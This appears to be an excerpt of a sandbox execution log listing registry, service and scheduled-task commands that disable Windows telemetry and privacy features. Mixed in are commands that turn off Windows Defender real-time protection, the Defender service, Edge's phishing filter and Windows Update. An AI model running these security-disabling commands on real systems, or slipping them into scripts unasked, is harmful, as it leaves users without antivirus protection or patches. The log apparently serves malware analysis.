C:\Windows\system32\reg.exeReg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows\Windows Search" /v "DisableWebSearch" /t REG_DWORD /d "1" /f7⤵PID:6000
-
-
C:\Windows\system32\reg.exeReg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows\Windows Search" /v "AllowSearchToUseLocation" /t REG_DWORD /d "0" /f7⤵PID:6056
-
-
C:\Windows\system32\reg.exeReg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows\Windows Search" /v "AllowCortanaAboveLock" /t REG_DWORD /d "0" /f7⤵PID:5472
-
-
C:\Windows\system32\reg.exeReg.exe add "HKLM\SOFTWARE\Microsoft\Speech_OneCore\Preferences" /v "ModelDownloadAllowed" /t REG_DWORD /d "0" /f7⤵PID:4748
-
-
C:\Windows\system32\reg.exeReg.exe add "HKCU\Software\Microsoft\InputPersonalization\TrainedDataStore" /v "HarvestContacts" /t REG_DWORD /d "0" /f7⤵PID:5812
-
-
C:\Windows\system32\reg.exeReg.exe add "HKCU\Software\Microsoft\InputPersonalization" /v "RestrictImplicitTextCollection" /t REG_DWORD /d "1" /f7⤵PID:6068
-
-
C:\Windows\system32\reg.exeReg.exe add "HKCU\Software\Microsoft\InputPersonalization" /v "RestrictImplicitInkCollection" /t REG_DWORD /d "1" /f7⤵PID:4560
-
-
C:\Windows\system32\reg.exeReg.exe add "HKCU\Software\Microsoft\Personalization\Settings" /v "AcceptedPrivacyPolicy" /t REG_DWORD /d "0" /f7⤵PID:3280
-
-
C:\Windows\system32\reg.exeReg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f7⤵PID:6092
-
-
C:\Windows\system32\reg.exeReg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableRoutinelyTakingAction" /t REG_DWORD /d "1" /f7⤵PID:3192
-
-
C:\Windows\system32\reg.exeReg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f7⤵
- Modifies Windows Defender Real-time Protection settings
PID:3788
-
-
C:\Windows\system32\reg.exeReg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f7⤵
- Modifies Windows Defender Real-time Protection settings
PID:4828
-
-
C:\Windows\system32\reg.exeReg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f7⤵
- Modifies Windows Defender Real-time Protection settings
PID:1188
-
-
C:\Windows\system32\reg.exeReg.exe add "HKLM\SYSTEM\ControlSet001\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f7⤵
- Modifies security service
PID:456
-
-
C:\Windows\system32\reg.exeReg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f7⤵
- Modifies security service
PID:6108
-
-
C:\Windows\system32\reg.exeReg.exe add "HKCU\System\GameConfigStore" /v "GameDVR_Enabled" /t REG_DWORD /d "0" /f7⤵PID:2280
-
-
C:\Windows\system32\reg.exeReg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows\GameDVR" /v "AllowGameDVR" /t REG_DWORD /d "0" /f7⤵PID:5420
-
-
C:\Windows\system32\sc.exesc stop dmwappushservice7⤵
- Launches sc.exe
PID:5168
-
-
C:\Windows\system32\net.exenet stop dmwappushservice7⤵PID:5136
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop dmwappushservice8⤵PID:5172
-
-
-
C:\Windows\system32\sc.exesc config dmwappushservice start= disabled7⤵
- Launches sc.exe
PID:5380
-
-
C:\Windows\system32\net.exenet stop diagnosticshub.standardcollector.service7⤵PID:2460
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop diagnosticshub.standardcollector.service8⤵PID:5292
-
-
-
C:\Windows\system32\sc.exesc config diagnosticshub.standardcollector.service start= disabled7⤵
- Launches sc.exe
PID:1240
-
-
C:\Windows\system32\reg.exeReg.exe add "HKLM\SYSTEM\CurrentControlSet\Control\WMI\AutoLogger\AutoLogger-Diagtrack-Listener" /v "Start" /t REG_DWORD /d "0" /f7⤵PID:1360
-
-
C:\Windows\system32\reg.exeReg.exe add "HKLM\SOFTWARE\Microsoft\WindowsSelfHost\UI\Visibility" /v "DiagnosticErrorText" /t REG_DWORD /d "0" /f7⤵PID:5368
-
-
C:\Windows\system32\reg.exeReg.exe add "HKLM\SOFTWARE\Microsoft\WindowsSelfHost\UI\Strings" /v "DiagnosticErrorText" /t REG_SZ /d "" /f7⤵PID:2796
-
-
C:\Windows\system32\reg.exeReg.exe add "HKLM\SOFTWARE\Microsoft\WindowsSelfHost\UI\Strings" /v "DiagnosticLinkText" /t REG_SZ /d "" /f7⤵PID:4456
-
-
C:\Windows\system32\reg.exeReg.exe add "HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\PhishingFilter" /v "EnabledV9" /t REG_DWORD /d "0" /f7⤵
- Modifies registry class
PID:4620
-
-
C:\Windows\system32\reg.exeReg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows\TabletPC" /v "PreventHandwritingDataSharing" /t REG_DWORD /d "1" /f7⤵PID:5404
-
-
C:\Windows\system32\reg.exeReg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows\HandwritingErrorReports" /v "PreventHandwritingErrorReports" /t REG_DWORD /d "1" /f7⤵PID:5492
-
-
C:\Windows\system32\reg.exeReg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows\AppCompat" /v "DisableInventory" /t REG_DWORD /d "1" /f7⤵PID:680
-
-
C:\Windows\system32\reg.exeReg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows\AppCompat" /v "DisableUAR" /t REG_DWORD /d "1" /f7⤵PID:5072
-
-
C:\Windows\system32\reg.exeReg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows\Personalization" /v "NoLockScreenCamera" /t REG_DWORD /d "1" /f7⤵PID:5496
-
-
C:\Windows\system32\reg.exeReg.exe add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AdvertisingInfo" /v "Enabled" /t REG_DWORD /d "0" /f7⤵PID:2340
-
-
C:\Windows\system32\reg.exeReg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\AdvertisingInfo" /v "Enabled" /t REG_DWORD /d "0" /f7⤵PID:3928
-
-
C:\Windows\system32\reg.exeReg.exe add "HKCU\Software\Microsoft\Input\TIPC" /v "Enabled" /t REG_DWORD /d "0" /f7⤵PID:1548
-
-
C:\Windows\system32\reg.exeReg.exe add "HKLM\SOFTWARE\Microsoft\PolicyManager\current\device\System" /v "AllowExperimentation" /t REG_DWORD /d "0" /f7⤵PID:4860
-
-
C:\Windows\system32\reg.exeReg.exe add "HKLM\SOFTWARE\Microsoft\PolicyManager\current\device\Bluetooth" /v "AllowAdvertising" /t REG_DWORD /d "0" /f7⤵PID:4968
-
-
C:\Windows\system32\reg.exeReg.exe add "HKLM\SOFTWARE\Microsoft\SQMClient\Windows" /v "CEIPEnable" /t REG_DWORD /d "0" /f7⤵PID:752
-
-
C:\Windows\system32\reg.exeReg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows\Messaging" /v "AllowMessageSync" /t REG_DWORD /d "0" /f7⤵PID:5436
-
-
C:\Windows\system32\reg.exeReg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Biometrics" /v "Enabled" /t REG_DWORD /d "0" /f7⤵PID:4908
-
-
C:\Windows\system32\reg.exeReg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\PushNotifications" /v "ToastEnabled" /t REG_DWORD /d "0" /f7⤵PID:2128
-
-
C:\Windows\system32\reg.exeReg.exe add "HKCU\Control Panel\International\User Profile" /v "HttpAcceptLanguageOptOut" /t REG_DWORD /d "1" /f7⤵PID:3836
-
-
C:\Windows\system32\reg.exeReg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\AppHost" /v "EnableWebContentEvaluation" /t REG_DWORD /d "0" /f7⤵PID:1536
-
-
C:\Windows\system32\reg.exeReg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\DeviceAccess\Global\{C1D23ACC-752B-43E5-8448-8D0E519CD6D6}" /v "Value" /t REG_SZ /d "Deny" /f7⤵PID:3948
-
-
C:\Windows\system32\reg.exeReg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v "Start_TrackProgs" /t REG_DWORD /d "0" /f7⤵PID:2928
-
-
C:\Windows\system32\reg.exeReg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v "ShowSyncProviderNotifications" /t REG_DWORD /d "0" /f7⤵PID:5680
-
-
C:\Windows\system32\reg.exeReg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\DeviceAccess\Global\{2297E4E2-5DBE-466D-A12B-0F8286F0D9CA}" /v "Value" /t REG_SZ /d "Deny" /f7⤵PID:2044
-
-
C:\Windows\system32\reg.exeReg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\DeviceAccess\Global\{E5323777-F976-4f5b-9B55-B94699C46E44}" /v "Value" /t REG_SZ /d "Deny" /f7⤵PID:2464
-
-
C:\Windows\system32\reg.exeReg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\DeviceAccess\Global\{2EEF81BE-33FA-4800-9670-1CD474972C3F}" /v "Value" /t REG_SZ /d "Deny" /f7⤵PID:5780
-
-
C:\Windows\system32\reg.exeReg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\DeviceAccess\Global\{52079E78-A92B-413F-B213-E8FE35712E72}" /v "Value" /t REG_SZ /d "Deny" /f7⤵PID:528
-
-
C:\Windows\system32\reg.exeReg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\DeviceAccess\Global\{7D7E8402-7C54-4821-A34E-AEEFD62DED93}" /v "Value" /t REG_SZ /d "Deny" /f7⤵PID:5728
-
-
C:\Windows\system32\reg.exeReg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\DeviceAccess\Global\{D89823BA-7180-4B81-B50C-7E471E6121A3}" /v "Value" /t REG_SZ /d "Deny" /f7⤵PID:500
-
-
C:\Windows\system32\reg.exeReg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\DeviceAccess\Global\{8BC668CF-7728-45BD-93F8-CF2B3B41D7AB}" /v "Value" /t REG_SZ /d "Deny" /f7⤵PID:3248
-
-
C:\Windows\system32\reg.exeReg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\DeviceAccess\Global\{9231CB4C-BF57-4AF3-8C55-FDA7BFCC04C5}" /v "Value" /t REG_SZ /d "Deny" /f7⤵PID:5784
-
-
C:\Windows\system32\reg.exeReg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\DeviceAccess\Global\{E390DF20-07DF-446D-B962-F5C953062741}" /v "Value" /t REG_SZ /d "Deny" /f7⤵PID:5308
-
-
C:\Windows\system32\reg.exeReg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\DeviceAccess\Global\{992AFA70-6F47-4148-B3E9-3003349C1548}" /v "Value" /t REG_SZ /d "Deny" /f7⤵PID:1736
-
-
C:\Windows\system32\reg.exeReg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\BackgroundAccessApplications" /v "GlobalUserDisabled" /t REG_DWORD /d "1" /f7⤵PID:3008
-
-
C:\Windows\system32\reg.exeReg.exe add "HKLM\SYSTEM\ControlSet001\Services\DiagTrack" /v "Start" /t REG_DWORD /d "4" /f7⤵PID:2236
-
-
C:\Windows\system32\reg.exeReg.exe add "HKLM\SYSTEM\ControlSet001\Services\dmwappushservice" /v "Start" /t REG_DWORD /d "4" /f7⤵PID:5788
-
-
C:\Windows\system32\reg.exeReg.exe add "HKLM\SYSTEM\ControlSet001\Control\WMI\Autologger\AutoLogger-Diagtrack-Listener" /v "Start" /t REG_DWORD /d "0" /f7⤵PID:5080
-
-
C:\Windows\system32\reg.exeReg.exe add "HKLM\SOFTWARE\Policies\Microsoft\WMDRM" /v "DisableOnline" /t REG_DWORD /d "1" /f7⤵PID:3804
-
-
C:\Windows\system32\reg.exeReg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\DeviceAccess\Global\{A8804298-2D5F-42E3-9531-9C8C39EB29CE}" /v "Value" /t REG_SZ /d "Deny" /f7⤵PID:5128
-
-
C:\Windows\system32\reg.exeReg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\DeviceAccess\Global\LooselyCoupled" /v "Value" /t REG_SZ /d "Deny" /f7⤵PID:5392
-
-
C:\Windows\system32\reg.exeReg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows\CredUI" /v "DisablePasswordReveal" /t REG_DWORD /d "1" /f7⤵PID:5648
-
-
C:\Windows\system32\reg.exeReg.exe add "HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main" /v "DoNotTrack" /t REG_DWORD /d "1" /f7⤵
- Modifies registry class
PID:5696
-
-
C:\Windows\system32\reg.exeReg.exe add "HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main" /v "OptimizeWindowsSearchResultsForScreenReaders" /t REG_DWORD /d "0" /f7⤵
- Modifies registry class
PID:5544
-
-
C:\Windows\system32\reg.exeReg.exe add "HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FlipAhead" /v "FPEnabled" /t REG_DWORD /d "0" /f7⤵
- Modifies registry class
PID:2028
-
-
C:\Windows\system32\reg.exeReg.exe add "HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\User\Default\SearchScopes" /v "ShowSearchSuggestionsGlobal" /t REG_DWORD /d "0" /f7⤵
- Modifies registry class
PID:5724
-
-
C:\Windows\system32\reg.exeReg.exe add "HKLM\SOFTWARE\Microsoft\PolicyManager\current\device\Browser" /v "AllowAddressBarDropdown" /t REG_DWORD /d "0" /f7⤵PID:5640
-
-
C:\Windows\system32\reg.exeReg.exe add "HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Privacy" /v "EnableEncryptedMediaExtensions" /t REG_DWORD /d "0" /f7⤵
- Modifies registry class
PID:5424
-
-
C:\Windows\system32\reg.exeReg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\SettingSync" /v "SyncPolicy" /t REG_DWORD /d "5" /f7⤵PID:5288
-
-
C:\Windows\system32\reg.exeReg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\SettingSync\Groups\Personalization" /v "Enabled" /t REG_DWORD /d "0" /f7⤵PID:5364
-
-
C:\Windows\system32\reg.exeReg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\SettingSync\Groups\BrowserSettings" /v "Enabled" /t REG_DWORD /d "0" /f7⤵PID:5700
-
-
C:\Windows\system32\reg.exeReg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\SettingSync\Groups\Credentials" /v "Enabled" /t REG_DWORD /d "0" /f7⤵PID:2160
-
-
C:\Windows\system32\reg.exeReg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\SettingSync\Groups\Language" /v "Enabled" /t REG_DWORD /d "0" /f7⤵PID:5160
-
-
C:\Windows\system32\reg.exeReg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\SettingSync\Groups\Accessibility" /v "Enabled" /t REG_DWORD /d "0" /f7⤵PID:4048
-
-
C:\Windows\system32\reg.exeReg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\SettingSync\Groups\Windows" /v "Enabled" /t REG_DWORD /d "0" /f7⤵PID:4268
-
-
C:\Windows\system32\reg.exeReg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows\Windows Search" /v "AllowCloudSearch" /t REG_DWORD /d "0" /f7⤵PID:5208
-
-
C:\Windows\system32\reg.exeReg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows\Windows Search" /v "ConnectedSearchUseWeb" /t REG_DWORD /d "0" /f7⤵PID:3000
-
-
C:\Windows\system32\reg.exeReg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows\Windows Search" /v "DisableWebSearch" /t REG_DWORD /d "1" /f7⤵PID:3196
-
-
C:\Windows\system32\reg.exeReg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows\Windows Search" /v "AllowSearchToUseLocation" /t REG_DWORD /d "0" /f7⤵PID:3596
-
-
C:\Windows\system32\reg.exeReg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows\Windows Search" /v "AllowCortana" /t REG_DWORD /d "0" /f7⤵PID:4904
-
-
C:\Windows\system32\reg.exeReg.exe add "HKLM\SOFTWARE\Microsoft\Speech_OneCore\Preferences" /v "ModelDownloadAllowed" /t REG_DWORD /d "0" /f7⤵PID:404
-
-
C:\Windows\system32\reg.exeReg.exe add "HKCU\Software\Microsoft\InputPersonalization\TrainedDataStore" /v "HarvestContacts" /t REG_DWORD /d "0" /f7⤵PID:4652
-
-
C:\Windows\system32\reg.exeReg.exe add "HKCU\Software\Microsoft\InputPersonalization" /v "RestrictImplicitTextCollection" /t REG_DWORD /d "1" /f7⤵PID:3304
-
-
C:\Windows\system32\reg.exeReg.exe add "HKCU\Software\Microsoft\InputPersonalization" /v "RestrictImplicitInkCollection" /t REG_DWORD /d "1" /f7⤵PID:4604
-
-
C:\Windows\system32\reg.exeReg.exe add "HKCU\Software\Microsoft\Personalization\Settings" /v "AcceptedPrivacyPolicy" /t REG_DWORD /d "0" /f7⤵PID:4260
-
-
C:\Windows\system32\reg.exeReg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows\LocationAndSensors" /v "DisableWindowsLocationProvider" /t REG_DWORD /d "1" /f7⤵PID:5824
-
-
C:\Windows\system32\reg.exeReg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows\LocationAndSensors" /v "DisableLocationScripting" /t REG_DWORD /d "1" /f7⤵PID:5200
-
-
C:\Windows\system32\reg.exeReg.exe add "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Sensor\Permissions\{BFA794E4-F964-4FDB-90F6-51056BFE4B44}" /v "SensorPermissionState" /t REG_DWORD /d "0" /f7⤵PID:2560
-
-
C:\Windows\system32\reg.exeReg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows\DataCollection" /v "AllowTelemetry" /t REG_DWORD /d "0" /f7⤵PID:2940
-
-
C:\Windows\system32\reg.exeReg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows\DataCollection" /v "DoNotShowFeedbackNotifications" /t REG_DWORD /d "1" /f7⤵PID:4760
-
-
C:\Windows\system32\reg.exeReg.exe add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\DataCollection" /v "AllowTelemetry" /t REG_DWORD /d "0" /f7⤵PID:2600
-
-
C:\Windows\system32\reg.exeReg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows\DeliveryOptimization" /v "DODownloadMode" /t REG_DWORD /d "0" /f7⤵PID:5836
-
-
C:\Windows\system32\reg.exeReg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\DeliveryOptimization" /v "SystemSettingsDownloadMode" /t REG_DWORD /d "0" /f7⤵PID:5892
-
-
C:\Windows\system32\reg.exeReg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Speech" /v "AllowSpeechModelUpdate" /t REG_DWORD /d "0" /f7⤵PID:5768
-
-
C:\Windows\system32\reg.exeReg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate" /v "DeferUpgrade" /t REG_DWORD /d "1" /f7⤵PID:5900
-
-
C:\Windows\system32\reg.exeReg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate" /v "DeferUpgradePeriod" /t REG_DWORD /d "1" /f7⤵PID:5988
-
-
C:\Windows\system32\reg.exeReg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate" /v "DeferUpdatePeriod" /t REG_DWORD /d "0" /f7⤵PID:2096
-
-
C:\Windows\system32\reg.exeReg.exe add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Device Metadata" /v "PreventDeviceMetadataFromNetwork" /t REG_DWORD /d "1" /f7⤵PID:5948
-
-
C:\Windows\system32\reg.exeReg.exe add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsStore\WindowsUpdate" /v "AutoDownload" /t REG_DWORD /d "2" /f7⤵PID:5936
-
-
C:\Windows\system32\reg.exeReg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU" /v "NoAutoUpdate" /t REG_DWORD /d "1" /f7⤵PID:460
-
-
C:\Windows\system32\reg.exeReg.exe add "HKLM\SYSTEM\ControlSet001\Services\wuauserv" /v "Start" /t REG_DWORD /d "4" /f7⤵
- Modifies security service
PID:5980
-
-
C:\Windows\system32\reg.exeReg.exe add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate\Services\7971f918-a847-4430-9279-4a52d1efe18d" /v "RegisteredWithAU" /t REG_DWORD /d "0" /f7⤵PID:5952
-
-
C:\Windows\system32\reg.exeReg.exe add "HKLM\SOFTWARE\Microsoft\OneDrive" /v "PreventNetworkTrafficPreUserSignIn" /t REG_DWORD /d "1" /f7⤵PID:5992
-
-
C:\Windows\system32\reg.exeReg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /t REG_DWORD /d "0" /f7⤵PID:5976
-
-
C:\Windows\system32\reg.exeReg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f7⤵PID:6020
-
-
C:\Windows\system32\reg.exeReg.exe add "HKLM\SOFTWARE\Policies\Microsoft\MRT" /v "DontReportInfectionInformation" /t REG_DWORD /d "1" /f7⤵PID:6044
-
-
C:\Windows\system32\reg.exeReg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f7⤵PID:2408
-
-
C:\Windows\system32\reg.exeReg.exe add "HKCU\Software\Microsoft\Siuf\Rules" /v "NumberOfSIUFInPeriod" /t REG_DWORD /d "0" /f7⤵PID:5472
-
-
C:\Windows\system32\reg.exeReg.exe add "HKCU\Software\Microsoft\Siuf\Rules" /v "PeriodInNanoSeconds" /t REG_DWORD /d "0" /f7⤵PID:5816
-
-
C:\Windows\system32\reg.exeReg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Search" /v "BingSearchEnabled" /t REG_DWORD /d "0" /f7⤵PID:6060
-
-
C:\Windows\system32\reg.exeReg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\ContentDeliveryManager" /v "SilentInstalledAppsEnabled" /t REG_DWORD /d "0" /f7⤵PID:6088
-
-
C:\Windows\system32\reg.exeReg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\ContentDeliveryManager" /v "SoftLandingEnabled" /t REG_DWORD /d "0" /f7⤵PID:1408
-
-
C:\Windows\system32\schtasks.exeschtasks /end /tn "\Microsoft\Windows\Customer Experience Improvement Program\Consolidator"7⤵PID:4608
-
-
C:\Windows\system32\schtasks.exeschtasks /change /tn "\Microsoft\Windows\Customer Experience Improvement Program\Consolidator" /disable7⤵PID:1412
-
-
C:\Windows\system32\schtasks.exeschtasks /end /tn "\Microsoft\Windows\Customer Experience Improvement Program\BthSQM"7⤵PID:1064
-
-
C:\Windows\system32\schtasks.exeschtasks /change /tn "\Microsoft\Windows\Customer Experience Improvement Program\BthSQM" /disable7⤵PID:3192
-
-
C:\Windows\system32\schtasks.exeschtasks /end /tn "\Microsoft\Windows\Customer Experience Improvement Program\KernelCeipTask"7⤵PID:3788
-
-
C:\Windows\system32\schtasks.exeschtasks /change /tn "\Microsoft\Windows\Customer Experience Improvement Program\KernelCeipTask" /disable7⤵PID:4828
-
-
C:\Windows\system32\schtasks.exeschtasks /end /tn "\Microsoft\Windows\Customer Experience Improvement Program\UsbCeip"7⤵PID:1188
-
-
C:\Windows\system32\schtasks.exeschtasks /change /tn "\Microsoft\Windows\Customer Experience Improvement Program\UsbCeip" /disable7⤵PID:264
-
-
C:\Windows\system32\schtasks.exeschtasks /end /tn "\Microsoft\Windows\Customer Experience Improvement Program\Uploader"7⤵PID:1952
-
-
C:\Windows\system32\schtasks.exeschtasks /change /tn "\Microsoft\Windows\Customer Experience Improvement Program\Uploader" /disable7⤵PID:2140
-
-
C:\Windows\system32\schtasks.exeschtasks /end /tn "\Microsoft\Windows\Application Experience\Microsoft Compatibility Appraiser"7⤵PID:2636
-
-
C:\Windows\system32\schtasks.exeschtasks /change /tn "\Microsoft\Windows\Application Experience\Microsoft Compatibility Appraiser" /disable7⤵PID:3020
-
-
C:\Windows\system32\schtasks.exeschtasks /end /tn "\Microsoft\Windows\Application Experience\ProgramDataUpdater"7⤵PID:6140
-
-
C:\Windows\system32\schtasks.exeschtasks /change /tn "\Microsoft\Windows\Application Experience\ProgramDataUpdater" /disable7⤵PID:3940
-
-
C:\Windows\system32\schtasks.exeschtasks /end /tn "\Microsoft\Windows\Application Experience\StartupAppTask"7⤵PID:4252
-
-
C:\Windows\system32\schtasks.exeschtasks /change /tn "\Microsoft\Windows\Application Experience\StartupAppTask" /disable"7⤵PID:1696
-
-
C:\Windows\system32\schtasks.exeschtasks /end /tn "\Microsoft\Windows\DiskDiagnostic\Microsoft-Windows-DiskDiagnosticDataCollector"7⤵PID:5380
-
-
C:\Windows\system32\schtasks.exeschtasks /change /tn "\Microsoft\Windows\DiskDiagnostic\Microsoft-Windows-DiskDiagnosticDataCollector" /disable7⤵PID:1616
-
-
C:\Windows\system32\schtasks.exeschtasks /end /tn "\Microsoft\Windows\DiskDiagnostic\Microsoft-Windows-DiskDiagnosticResolver"7⤵PID:2492
-
-
C:\Windows\system32\schtasks.exeschtasks /change /tn "\Microsoft\Windows\DiskDiagnostic\Microsoft-Windows-DiskDiagnosticResolver" /disable7⤵PID:1240
-
-
C:\Windows\system32\schtasks.exeschtasks /end /tn "\Microsoft\Windows\Power Efficiency Diagnostics\AnalyzeSystem"7⤵PID:5372
-
-
C:\Windows\system32\schtasks.exeschtasks /change /tn "\Microsoft\Windows\Power Efficiency Diagnostics\AnalyzeSystem" /disable7⤵PID:3068
-
-
C:\Windows\system32\schtasks.exeschtasks /end /tn "\Microsoft\Windows\Shell\FamilySafetyMonitor"7⤵PID:4712
-
-
C:\Windows\system32\schtasks.exeschtasks /change /tn "\Microsoft\Windows\Shell\FamilySafetyMonitor" /disable7⤵PID:1760
-
-
C:\Windows\system32\schtasks.exeschtasks /end /tn "\Microsoft\Windows\Shell\FamilySafetyRefresh"7⤵PID:5396
-
-
C:\Windows\system32\schtasks.exeschtasks /change /tn "\Microsoft\Windows\Shell\FamilySafetyRefresh" /disable7⤵PID:5412
-
-
C:\Windows\system32\schtasks.exeschtasks /end /tn "\Microsoft\Windows\Shell\FamilySafetyUpload"7⤵PID:5532
-
-
C:\Windows\system32\schtasks.exeschtasks /change /tn "\Microsoft\Windows\Shell\FamilySafetyUpload" /disable7⤵PID:2268
-
-
C:\Windows\system32\schtasks.exeschtasks /end /tn "\Microsoft\Windows\Autochk\Proxy"7⤵PID:5584
-
-
C:\Windows\system32\schtasks.exeschtasks /change /tn "\Microsoft\Windows\Autochk\Proxy" /disable7⤵PID:5504
-
-
C:\Windows\system32\schtasks.exeschtasks /end /tn "\Microsoft\Windows\Maintenance\WinSAT"7⤵PID:5516
-
-
C:\Windows\system32\schtasks.exeschtasks /change /tn "\Microsoft\Windows\Maintenance\WinSAT" /disable7⤵PID:5500
-
-
C:\Windows\system32\schtasks.exeschtasks /end /tn "\Microsoft\Windows\Application Experience\AitAgent"7⤵PID:1740
-
-
C:\Windows\system32\schtasks.exeschtasks /change /tn "\Microsoft\Windows\Application Experience\AitAgent" /disable7⤵PID:2032
-
-
C:\Windows\system32\schtasks.exeschtasks /end /tn "\Microsoft\Windows\Windows Error Reporting\QueueReporting"7⤵PID:5040
-
-
C:\Windows\system32\schtasks.exeschtasks /change /tn "\Microsoft\Windows\Windows Error Reporting\QueueReporting" /disable7⤵PID:4720
-
-
C:\Windows\system32\schtasks.exeschtasks /end /tn "\Microsoft\Windows\CloudExperienceHost\CreateObjectTask"7⤵PID:5620
-
-
C:\Windows\system32\schtasks.exeschtasks /change /tn "\Microsoft\Windows\CloudExperienceHost\CreateObjectTask" /disable7⤵PID:5476
-
-
C:\Windows\system32\schtasks.exeschtasks /end /tn "\Microsoft\Windows\DiskFootprint\Diagnostics"7⤵PID:5180
-
-
C:\Windows\system32\schtasks.exeschtasks /change /tn "\Microsoft\Windows\DiskFootprint\Diagnostics" /disable7⤵PID:5568
-
-
C:\Windows\system32\schtasks.exeschtasks /end /tn "\Microsoft\Windows\FileHistory\File History (maintenance mode)"7⤵PID:3484
-
-
C:\Windows\system32\schtasks.exeschtasks /change /tn "\Microsoft\Windows\FileHistory\File History (maintenance mode)" /disable7⤵PID:1668
-
